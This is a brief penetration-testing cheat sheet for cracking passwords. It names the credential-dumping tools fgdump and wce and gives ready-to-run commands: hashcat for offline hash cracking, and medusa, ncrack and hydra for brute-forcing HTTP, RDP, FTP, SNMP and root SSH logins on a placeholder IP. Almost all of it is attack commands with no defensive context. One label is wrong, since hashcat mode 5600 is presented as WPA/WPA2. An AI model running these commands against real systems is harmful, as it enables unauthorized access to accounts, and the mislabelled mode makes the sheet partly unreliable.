password cracking cheat sheet
--Tools
#RSMangler will take a word list and perform various manipulations on it similar to those done by John the Ripper with a few extras.
fgdump
wce (32 and 64 bit)
--References
https://blog.coresecurity.com/2010/11/02/building-a-wordlist-for-dictionary-attacks/


--OCLHashcat NTLM
hashcat -m 1000 -a 0 --remove -o cracked.txt hashes.hash [PASSWORDFILE.TXT]

--OCLHashcat WPA/WPA2
/opt/hashcat/cudaHashcat-2.01/cudaHashcat64.bin -m 5600 -a 0 -o cracked.txt --remove hashes.hash /cracking/wordlist/crackstation.txt

--medusa
medusa -h 10.10.10.10 -u admin -P [PASSWORDFILE.TXT] -M http -m DIR:/[USERNAME] -T 10

--ncrack [Great for RDP]
ncrack -vv --user [username] -P [PASSWORDFILE.TXT] rdp://10.10.10.10
ncrack -v -f --user [username] -P [PASSWORDFILE.TXT] rdp://10.10.10.10,CL=1

--hydra
hydra -l [USERNAME] -P [PASSWORDFILE.TXT] -v 10.10.10.10 ftp
hydra -P [PASSWORDFILE.TXT] -v 10.10.10.10 snmp
hydra -l root -P [PASSWORDFILE.TXT] 10.10.10.10 ssh
